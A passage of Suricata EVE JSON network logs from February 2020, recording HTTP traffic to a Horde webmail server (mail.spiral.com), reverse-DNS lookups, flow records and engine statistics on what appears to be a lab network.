HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:15:14.111009+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34838,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19292,"tx_id":1}} {"timestamp":"2020-02-29T00:15:17.000641+0000","flow_id":1917516803235951,"event_type":"flow","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:16.614511+0000","end":"2020-02-29T00:10:16.722829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:18.901872+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:15:18.902890+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34842,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:15:19.000178+0000","event_type":"stats","stats":{"uptime":14571,"capture":{"kernel_packets":135935,"kernel_drops":0},"decoder":{"pkts":135937,"bytes":93547486,"invalid":188,"ipv4":134426,"ipv6":8,"ethernet":135937,"raw":0,"null":0,"sll":0,"tcp":129065,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099936},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2395,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":25125,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} {"timestamp":"2020-02-29T00:15:22.000308+0000","flow_id":854757210952885,"event_type":"flow","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:21.758965+0000","end":"2020-02-29T00:10:21.866749+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000280+0000","flow_id":1577625976740859,"event_type":"flow","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.629755+0000","end":"2020-02-29T00:10:22.738168+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000607+0000","flow_id":1445628746846607,"event_type":"flow","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.840079+0000","end":"2020-02-29T00:10:22.948426+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.000695+0000","flow_id":1378485523115176,"event_type":"flow","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.978088+0000","end":"2020-02-29T00:10:23.086656+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.919104+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10440,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:25.153993+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994}} {"timestamp":"2020-02-29T00:15:26.000239+0000","event_type":"stats","stats":{"uptime":14578,"capture":{"kernel_packets":135939,"kernel_drops":0},"decoder":{"pkts":135941,"bytes":93547750,"invalid":188,"ipv4":134430,"ipv6":8,"ethernet":135941,"raw":0,"null":0,"sll":0,"tcp":129069,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2398,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":132277,"memcap":0}}} {"timestamp":"2020-02-29T00:15:27.000847+0000","flow_id":106655512661597,"event_type":"flow","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:26.069213+0000","end":"2020-02-29T00:10:26.177585+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:27.481543+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":45876,"tx_id":0}} {"timestamp":"2020-02-29T00:15:27.489535+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39614,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:27.654066+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273}} {"timestamp":"2020-02-29T00:15:29.000300+0000","flow_id":1297456683777400,"event_type":"flow","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":1153,"bytes_toclient":9222,"start":"2020-02-29T00:13:51.621944+0000","end":"2020-02-29T00:14:28.518250+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:32.654078+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":35273,"tx_id":1}} {"timestamp":"2020-02-29T00:15:33.000226+0000","event_type":"stats","stats":{"uptime":14585,"capture":{"kernel_packets":135960,"kernel_drops":0},"decoder":{"pkts":135974,"bytes":93568102,"invalid":188,"ipv4":134463,"ipv6":8,"ethernet":135974,"raw":0,"null":0,"sll":0,"tcp":129098,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2768,"new_pruned":15,"est_pruned":2400,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} {"timestamp":"2020-02-29T00:15:35.000636+0000","flow_id":1080320319612926,"event_type":"flow","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":12,"bytes_toserver":1533,"bytes_toclient":9963,"start":"2020-02-29T00:14:28.518142+0000","end":"2020-02-29T00:14:34.691080+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:36.000855+0000","flow_id":1681976502983035,"event_type":"flow","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:35.072059+0000","end":"2020-02-29T00:10:35.180346+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:40.000158+0000","event_type":"stats","stats":{"uptime":14592,"capture":{"kernel_packets":135976,"kernel_drops":0},"decoder":{"pkts":135977,"bytes":93568300,"invalid":188,"ipv4":134466,"ipv6":8,"ethernet":135977,"raw":0,"null":0,"sll":0,"tcp":129101,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2769,"new_pruned":15,"est_pruned":2401,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23801,"memcap_state":0,"memcap_global":0},"http":{"memuse":46574,"memcap":0}}} {"timestamp":"2020-02-29T00:15:40.002310+0000","flow_id":54888288126643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:14:34.689843+0000","end":"2020-02-29T00:14:39.874407+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:41.000176+0000","flow_id":1207756279237984,"event_type":"flow","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.249184+0000","end":"2020-02-29T00:10:39.357577+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:41.000427+0000","flow_id":2107843985516552,"event_type":"flow","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.436232+0000","end":"2020-02-29T00:10:39.544428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.000587+0000","flow_id":2049496855059110,"event_type":"flow","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:43.170662+0000","end":"2020-02-29T00:10:43.278991+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.873520+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56447,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:45.143410+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760}} {"timestamp":"2020-02-29T00:15:46.000610+0000","flow_id":1209336842897935,"event_type":"flow","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1089,"bytes_toclient":7728,"start":"2020-02-29T00:14:39.936463+0000","end":"2020-02-29T00:14:45.180132+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:47.000223+0000","event_type":"stats","stats":{"uptime":14599,"capture":{"kernel_packets":135984,"kernel_drops":0},"decoder":{"pkts":135995,"bytes":93577219,"invalid":188,"ipv4":134484,"ipv6":8,"ethernet":135995,"raw":0,"null":0,"sll":0,"tcp":129117,"udp":5164,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2789,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2805,"synack":2796,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1828,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2361,"failed_udp":112},"tx":{"http":4692,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2441}},"flow_mgr":{"closed_pruned":2770,"new_pruned":15,"est_pruned":2404,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23141,"memcap_state":0,"memcap_global":0},"http":{"memuse":98271,"memcap":0}}} {"timestamp":"2020-02-29T00:15:49.000673+0000","flow_id":1084958869762291,"event_type":"flow","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:47.995571+0000","end":"2020-02-29T00:10:48.103585+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000287+0000","flow_id":1715253910491618,"event_type":"flow","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:48.905698+0000","end":"2020-02-29T00:10:49.013601+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000649+0000","flow_id":1095949691237231,"event_type":"flow","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.242543+0000","end":"2020-02-29T00:10:49.351235+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000730+0000","flow_id":1940791233185635,"event_type":"flow","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.100195+0000","end":"2020-02-29T00:10:49.208618+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.144599+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34844,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33149,"tx_id":0}} {"timestamp":"2020-02-29T00:15:50.221676+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24645,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 